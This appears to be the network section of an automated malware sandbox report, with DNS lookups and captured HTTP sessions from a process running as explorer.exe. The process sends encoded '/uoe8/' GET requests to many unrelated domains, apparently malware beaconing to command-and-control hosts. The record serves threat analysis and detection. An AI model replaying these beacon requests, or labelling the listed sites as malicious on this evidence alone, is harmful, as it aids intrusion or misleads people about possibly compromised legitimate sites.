                                                                            Apr 12, 2021 10:07:17.966291904 CEST8.8.8.8192.168.2.30x7657No error (0)k9cdna.51w4.com45.142.156.44A (IP address)IN (0x0001)
                                                                            Apr 12, 2021 10:07:23.506768942 CEST8.8.8.8192.168.2.30x1eb0No error (0)www.montcoimmigrationlawyer.commontcoimmigrationlawyer.comCNAME (Canonical name)IN (0x0001)
                                                                            Apr 12, 2021 10:07:23.506768942 CEST8.8.8.8192.168.2.30x1eb0No error (0)montcoimmigrationlawyer.com184.168.131.241A (IP address)IN (0x0001)
                                                                            Apr 12, 2021 10:07:29.043720007 CEST8.8.8.8192.168.2.30xfa46No error (0)www.missjeschickt.commissjeschickt.comCNAME (Canonical name)IN (0x0001)
                                                                            Apr 12, 2021 10:07:29.043720007 CEST8.8.8.8192.168.2.30xfa46No error (0)missjeschickt.com81.169.145.72A (IP address)IN (0x0001)
                                                                            Apr 12, 2021 10:07:34.549664021 CEST8.8.8.8192.168.2.30x436eNo error (0)www.plaisterpress.com104.21.24.135A (IP address)IN (0x0001)
                                                                            Apr 12, 2021 10:07:34.549664021 CEST8.8.8.8192.168.2.30x436eNo error (0)www.plaisterpress.com172.67.218.244A (IP address)IN (0x0001)

                                                                            HTTP Request Dependency Graph

                                                                            • www.fibermover.com
                                                                            • www.mojilifenoosa.com
                                                                            • www.7chd.com
                                                                            • www.hispekdiamond.com
                                                                            • www.swashbug.com
                                                                            • www.zagorafinancial.com
                                                                            • www.funnyfootballmugs.com
                                                                            • www.przyczepy.net
                                                                            • www.3992199.com
                                                                            • www.montcoimmigrationlawyer.com
                                                                            • www.missjeschickt.com

                                                                            HTTP Packets

                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            0192.168.2.34970934.102.136.18080C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Apr 12, 2021 10:06:12.742605925 CEST1025OUTGET /uoe8/?Dnh8=6wr609Vx9lIYE8xJyDK49BerhrrLsGkNJqd9AfCiKUtPUCt4zBl+uaOpo8ym8tjcWxTe&pPB=K2MxltkHBDK4hDMp HTTP/1.1
                                                                            Host: www.fibermover.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Apr 12, 2021 10:06:12.886359930 CEST1026INHTTP/1.1 403 Forbidden
                                                                            Server: openresty
                                                                            Date: Mon, 12 Apr 2021 08:06:12 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 275
                                                                            ETag: "6070a8c0-113"
                                                                            Via: 1.1 google
                                                                            Connection: close
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            1192.168.2.349711184.168.131.24180C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Apr 12, 2021 10:06:18.181508064 CEST1029OUTGET /uoe8/?Dnh8=CVv7qMV6HbciCWFzqhUZZAQ0US+YdWqRbJ1eYpd5+PQQEEyRiYk8iw/aqhx7FohNRjRK&pPB=K2MxltkHBDK4hDMp HTTP/1.1
                                                                            Host: www.mojilifenoosa.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Apr 12, 2021 10:06:18.420839071 CEST1029INHTTP/1.1 301 Moved Permanently
                                                                            Server: nginx/1.16.1
                                                                            Date: Mon, 12 Apr 2021 08:06:18 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Location: http://www.mojiproducts.com/register?Dnh8=CVv7qMV6HbciCWFzqhUZZAQ0US+YdWqRbJ1eYpd5+PQQEEyRiYk8iw/aqhx7FohNRjRK&pPB=K2MxltkHBDK4hDMp
                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            10192.168.2.34973481.169.145.7280C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Apr 12, 2021 10:07:29.401462078 CEST5087OUTGET /uoe8/?Dnh8=4x9Go+G4sQK1bPcn4vkzPWadXV0GNuVhhd/eQWnbDPmuQCX7Nztt7R8hTxXUs1RW0ALQ&pPB=K2MxltkHBDK4hDMp HTTP/1.1
                                                                            Host: www.missjeschickt.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Apr 12, 2021 10:07:29.445220947 CEST5088INHTTP/1.1 404 Not Found
                                                                            Date: Mon, 12 Apr 2021 08:07:29 GMT
                                                                            Server: Apache/2.4.46 (Unix)
                                                                            Content-Length: 196
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            11192.168.2.34973634.102.136.18080C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Apr 12, 2021 10:07:39.705074072 CEST5090OUTGET /uoe8/?Dnh8=6wr609Vx9lIYE8xJyDK49BerhrrLsGkNJqd9AfCiKUtPUCt4zBl+uaOpo8ym8tjcWxTe&pPB=K2MxltkHBDK4hDMp HTTP/1.1
                                                                            Host: www.fibermover.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Apr 12, 2021 10:07:39.845865965 CEST5091INHTTP/1.1 403 Forbidden
                                                                            Server: openresty
                                                                            Date: Mon, 12 Apr 2021 08:07:39 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 275
                                                                            ETag: "6070a8c0-113"
                                                                            Via: 1.1 google
                                                                            Connection: close
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            2192.168.2.34971352.15.160.16780C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Apr 12, 2021 10:06:24.103583097 CEST1034OUTGET /uoe8/?Dnh8=pp2ekQWroypTFKaJa5Qkcd1bUyGAkfDbiqxtSX5G9L70Cmz7PeGJVxgmdicR3ONQ4/wh&pPB=K2MxltkHBDK4hDMp HTTP/1.1
                                                                            Host: www.7chd.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Apr 12, 2021 10:06:24.241137028 CEST1035INHTTP/1.1 404 Not Found
                                                                            Date: Mon, 12 Apr 2021 08:06:24 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 153
                                                                            Connection: close
                                                                            Server: nginx/1.16.1
                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            3192.168.2.349718213.171.195.10580C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Apr 12, 2021 10:06:39.648039103 CEST4176OUTGET /uoe8/?Dnh8=UhlVi8jLiQUXpO3Mm3lJbnFIbsRb97T5i2flOgFV3YbeH0Xk3z/nbJUyPEwPPltkxnEn&pPB=K2MxltkHBDK4hDMp HTTP/1.1
                                                                            Host: www.hispekdiamond.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Apr 12, 2021 10:06:39.703871965 CEST4176INHTTP/1.1 200 OK
                                                                            Server: nginx/1.16.1
                                                                            Date: Mon, 12 Apr 2021 08:06:39 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 1358
                                                                            Last-Modified: Wed, 02 Sep 2015 11:05:06 GMT
                                                                            Connection: close
                                                                            ETag: "55e6d7e2-54e"
                                                                            Accept-Ranges: bytes


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            4192.168.2.349721169.1.24.24480C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Apr 12, 2021 10:06:45.261780977 CEST4999OUTGET /uoe8/?Dnh8=jbWl/12JT1iDRb0v1vq5On9CelmHmR3hJr6gjt0xDgcmriA4IMeiSysiloI+majB4Luo&pPB=K2MxltkHBDK4hDMp HTTP/1.1
                                                                            Host: www.swashbug.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Apr 12, 2021 10:06:45.496073008 CEST5000INHTTP/1.1 200 OK
                                                                            Server: nginx
                                                                            Date: Mon, 12 Apr 2021 08:06:45 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 389
                                                                            Last-Modified: Tue, 28 Apr 2020 08:37:12 GMT
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            ETag: "5ea7eb38-185"
                                                                            X-XSS-Protection: 1; mode=block
                                                                            X-Content-Type-Options: nosniff
                                                                            X-Server-Powered-By: AfrRouter
                                                                            Accept-Ranges: bytes
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 44 6f 6d 61 69 6e 20 52 65 67 69 73 74 65 72 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 61 66 72 69 68 6f 73 74 2e 63 6f 6d 2f 72 65 73 6f 75 72 63 65 73 2f 64 6f 6d 61 69 6e 5f 70 61 67 65 73 2f 63 6f 6d 69 6e 67 5f 73 6f 6f 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8" /> <title>Domain Registered</title> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" /> </head> <body> <script type="text/javascript" src="https://cdn.afrihost.com/resources/domain_pages/coming_soon.js"></script> </body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            5192.168.2.349723162.209.114.20180C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Apr 12, 2021 10:06:50.801923037 CEST5012OUTGET /uoe8/?Dnh8=0AgkmMdb/xcAtot8xloO7jEL6e2GWsoAGGF4g5velsS4rIzaA3O5+OYWQMQKg8Hr7C9A&pPB=K2MxltkHBDK4hDMp HTTP/1.1
                                                                            Host: www.zagorafinancial.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Apr 12, 2021 10:06:50.927325964 CEST5013INHTTP/1.1 301 Moved Permanently
                                                                            Server: Apache/2.4.38 (Debian)
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Date: Mon, 12 Apr 2021 08:06:50 GMT
                                                                            Location: http://www.zagorafinancial.com/uoe8?Dnh8=0AgkmMdb/xcAtot8xloO7jEL6e2GWsoAGGF4g5velsS4rIzaA3O5+OYWQMQKg8Hr7C9A&pPB=K2MxltkHBDK4hDMp
                                                                            Keep-Alive: timeout=5, max=100
                                                                            Connection: close
                                                                            Set-Cookie: X-Mapping-fjhppofk=F4200E476AB699C7006F4ED450BE5EF4; path=/
                                                                            Content-Length: 431
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 7a 61 67 6f 72 61 66 69 6e 61 6e 63 69 61 6c 2e 63 6f 6d 2f 75 6f 65 38 3f 44 6e 68 38 3d 30 41 67 6b 6d 4d 64 62 2f 78 63 41 74 6f 74 38 78 6c 6f 4f 37 6a 45 4c 36 65 32 47 57 73 6f 41 47 47 46 34 67 35 76 65 6c 73 53 34 72 49 7a 61 41 33 4f 35 2b 4f 59 57 51 4d 51 4b 67 38 48 72 37 43 39 41 26 61 6d 70 3b 70 50 42 3d 4b 32 4d 78 6c 74 6b 48 42 44 4b 34 68 44 4d 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 7a 61 67 6f 72 61 66 69 6e 61 6e 63 69 61 6c 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.zagorafinancial.com/uoe8?Dnh8=0AgkmMdb/xcAtot8xloO7jEL6e2GWsoAGGF4g5velsS4rIzaA3O5+OYWQMQKg8Hr7C9A&amp;pPB=K2MxltkHBDK4hDMp">here</a>.</p><hr><address>Apache/2.4.38 (Debian) Server at www.zagorafinancial.com Port 80</address></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            6192.168.2.34972523.227.38.7480C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Apr 12, 2021 10:06:56.074539900 CEST5027OUTGET /uoe8/?Dnh8=oRF9sMnf9PdLhjUOIBAEDWVppNUvEE2O6ED6s7IbEJi5z3I9xavY20aFrDWDg7pV30V8&pPB=K2MxltkHBDK4hDMp HTTP/1.1
                                                                            Host: www.funnyfootballmugs.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Apr 12, 2021 10:06:56.251104116 CEST5029INHTTP/1.1 403 Forbidden
                                                                            Date: Mon, 12 Apr 2021 08:06:56 GMT
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            X-Sorting-Hat-PodId: -1
                                                                            X-Dc: gcp-us-central1
                                                                            X-Request-ID: ee683330-34a4-49fd-a8a8-061e94606168
                                                                            Set-Cookie: _shopify_fs=2021-04-12T08%3A06%3A56Z; Expires=Tue, 12-Apr-22 08:06:56 GMT; Domain=funnyfootballmugs.com; Path=/; SameSite=Lax
                                                                            X-XSS-Protection: 1; mode=block
                                                                            X-Download-Options: noopen
                                                                            X-Content-Type-Options: nosniff
                                                                            X-Permitted-Cross-Domain-Policies: none
                                                                            CF-Cache-Status: DYNAMIC
                                                                            cf-request-id: 0966b7a16d00004ed36109e000000001
                                                                            Server: cloudflare
                                                                            CF-RAY: 63eaf548a8ab4ed3-FRA
                                                                            alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                            Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d
                                                                            Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;m


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            7192.168.2.349726185.253.212.2280C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Apr 12, 2021 10:07:06.537733078 CEST5035OUTGET /uoe8/?Dnh8=TYKQicIMvKRESm/flOMvKt3N/kbr0v+cwHo5PwIdzkllwLOIwmCeEw+gbEKOgk8UbATi&pPB=K2MxltkHBDK4hDMp HTTP/1.1
                                                                            Host: www.przyczepy.net
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Apr 12, 2021 10:07:06.602643967 CEST5035INHTTP/1.1 403 Forbidden
                                                                            Server: nginx
                                                                            Date: Mon, 12 Apr 2021 08:07:06 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 146
                                                                            Connection: close
                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            8192.168.2.34973245.142.156.4480C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Apr 12, 2021 10:07:18.188160896 CEST5085OUTGET /uoe8/?Dnh8=h2lbrHqA/lU/5ydhtyDssHwS0ovAY6emeVgF9WK6HhWxxVaP+H0Yfne8Qd/1EA4oYSoB&pPB=K2MxltkHBDK4hDMp HTTP/1.1
                                                                            Host: www.3992199.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Apr 12, 2021 10:07:18.403820038 CEST5085INHTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Mon, 12 Apr 2021 07:55:43 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 146
                                                                            Connection: close
                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            9192.168.2.349733184.168.131.24180C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Apr 12, 2021 10:07:23.705914021 CEST5086OUTGET /uoe8/?Dnh8=DVW7OxuTiipzhEotDzIJzGfsiMq3vXOqW3PM8kZWjghPJAmdu1p3BOMI8OM6bfwnU86n&pPB=K2MxltkHBDK4hDMp HTTP/1.1
                                                                            Host: www.montcoimmigrationlawyer.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Apr 12, 2021 10:07:23.957165956 CEST5087INHTTP/1.1 301 Moved Permanently
                                                                            Server: nginx/1.16.1
                                                                            Date: Mon, 12 Apr 2021 08:07:23 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Location: https://shglawpa.com/uoe8/?Dnh8=DVW7OxuTiipzhEotDzIJzGfsiMq3vXOqW3PM8kZWjghPJAmdu1p3BOMI8OM6bfwnU86n&pPB=K2MxltkHBDK4hDMp
                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Code Manipulations

                                                                            Statistics

                                                                            Behavior

                                                                            Click to jump to process

